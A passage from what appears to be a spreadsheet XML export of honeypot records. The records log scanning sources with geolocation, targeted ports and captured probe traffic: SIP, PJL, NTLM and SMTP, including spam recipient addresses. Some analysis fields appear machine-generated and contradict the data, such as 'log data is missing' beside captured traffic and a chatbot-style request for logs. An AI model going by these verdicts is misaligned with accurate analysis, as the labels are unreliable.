    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Hsinchu City"/>
    <s v="Hsinchu"/>
    <s v="1675151"/>
    <s v="NA"/>
    <s v="24.8138"/>
    <s v="120.967"/>
    <s v="131596"/>
    <s v="TBC"/>
    <s v="TBCOM"/>
    <s v="residential"/>
    <s v="Taiwan Broadband Communications, Co."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d3a:4664"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="292"/>
    <x v="292"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:12:34"/>
    <d v="2024-03-10T06:05:00"/>
    <d v="2025-04-30T02:12:34"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;1054&amp;&amp;26320&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Amroha"/>
    <s v="Morādābād (Majhola)"/>
    <s v="1262801"/>
    <s v="244001"/>
    <s v="28.83"/>
    <s v="78.7419"/>
    <s v="135182"/>
    <s v="MORADABAD INTERNET SERVICES PRIVATE LIMITED"/>
    <s v="Moradabad Internet Services Private Limited"/>
    <s v="business"/>
    <s v="Speed Infotech Solutions"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:cfbb"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="293"/>
    <x v="293"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:12:25"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T02:12:25"/>
    <n v="279"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MYSQL_H26&amp;&amp;SMA-LAB_MYSQL_H31&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_MYSQL_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;3306&amp;&amp;110&amp;&amp;80&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;5432&amp;&amp;389&amp;&amp;43528&amp;&amp;9100&amp;&amp;443&amp;&amp;445&amp;&amp;3389&amp;&amp;25"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;GET&amp;&amp;query&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=49453'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=58357'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=39708'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=53022'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=50872'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=56396'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=58385'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '103.113.68.70:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '103.113.68.70:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '103.113.68.70:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=47846'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.207,57212)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (ayDZKsaP,)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.26.156.60:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.207;rport=47982'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 209.145.61.177:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.207,57684)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (wwdYTlMT,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.182.38.84:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 45.14.244.111:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.118.77:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '185.250.150.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dcf"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No malicious activity detected as log data is missing."/>
    <s v="I need some log data to analyze! Please provide it, and I'll be happy to identify the types of attacks. &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="294"/>
    <x v="294"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:12:19"/>
    <d v="2024-12-31T04:21:42"/>
    <d v="2025-04-30T02:12:19"/>
    <n v="177"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_H18&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MO"/>
    <s v="Missouri"/>
    <s v="Jackson"/>
    <s v="Kansas City (Paseo West)"/>
    <s v="4393217"/>
    <s v="64106"/>
    <s v="39.1049"/>
    <s v="-94.568"/>
    <s v="399045"/>
    <s v="DediOutlet, LLC"/>
    <s v="DediOutlet, LLC"/>
    <s v="hosting"/>
    <s v="DediOutlet, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68a7:dec7"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data provided, cannot analyze or comment on malicious activity. &amp;&amp; No available log data provided for analysis. &amp;&amp; The SMTP service is being scanned, possibly indicating a reconnaissance activity to identify potential vulnerabilities or determine if the system is available for further exploitation. This is often an initial step by attackers before launching more sophisticated attacks. It could also be part of a larger scanning operation targeting multiple systems and services. &amp;&amp; An attacker is attempting to initiate a secure connection for SMTP protocol. This could be an initial step for email-based attacks such as phishing or spamming. The attacker may be trying to establish a persistent connection."/>
    <s v="SMTP Exploit"/>
  </r>
  <r>
    <x v="295"/>
    <x v="295"/>
    <s v="110-24-32-8.adsl.fetnet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:12:15"/>
    <d v="2023-11-29T15:23:38"/>
    <d v="2025-04-30T02:12:15"/>
    <n v="782"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H20&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SOCKS5_H30&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_HTTP_H34&amp;&amp;SMA-LAB_SSH_H25&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;389&amp;&amp;1080&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;10310&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Banqiao District"/>
    <s v="1670029"/>
    <s v="NA"/>
    <s v="25.0114"/>
    <s v="121.462"/>
    <s v="9674"/>
    <s v="Far EastTone Telecommunication Co., Ltd."/>
    <s v="Far EasTone Telecommunication Co., Ltd."/>
    <s v="residential"/>
    <s v="FETNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e18:2008"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="296"/>
    <x v="296"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:11:43"/>
    <d v="2024-04-09T11:22:00"/>
    <d v="2025-04-30T02:11:43"/>
    <n v="40"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23&amp;&amp;21655&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:2e79"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="297"/>
    <x v="297"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:11:33"/>
    <d v="2024-12-24T06:56:00"/>
    <d v="2025-04-30T02:11:33"/>
    <n v="267"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Spam Message Body&amp;&amp;Session Manipulation"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_DNS_H44"/>
    <s v="25&amp;&amp;53&amp;&amp;NA&amp;&amp;27160"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="KU"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="Kaunas"/>
    <s v="598316"/>
    <s v="44001"/>
    <s v="54.9072"/>
    <s v="24.0019"/>
    <s v="209605"/>
    <s v="UAB Host Baltic"/>
    <s v="UAB Host Baltic"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@fuse.net&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;agicash@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;evansvenzina@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;antonio_guterres1@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;stevenvoors@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;susanaarnold@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abidoshaakacompanies@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;abidoshaakacompanies11@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_DNS:NA}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1739907910'] ttl=894&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=894&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=894&gt;}&amp;&amp;NA&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299317 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20481&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741902309'] ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=681&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299323 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20480&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741905906'] ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=680&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299335 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20096&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741912211'] ttl=296&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299337 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20484&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741913101'] ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=684&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299360 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20487&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741927510'] ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=687&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299359 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20149&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299376 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20745&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741938311'] ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=945&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741941012'] ttl=439&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299383 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20518&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741941902'] ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;NS 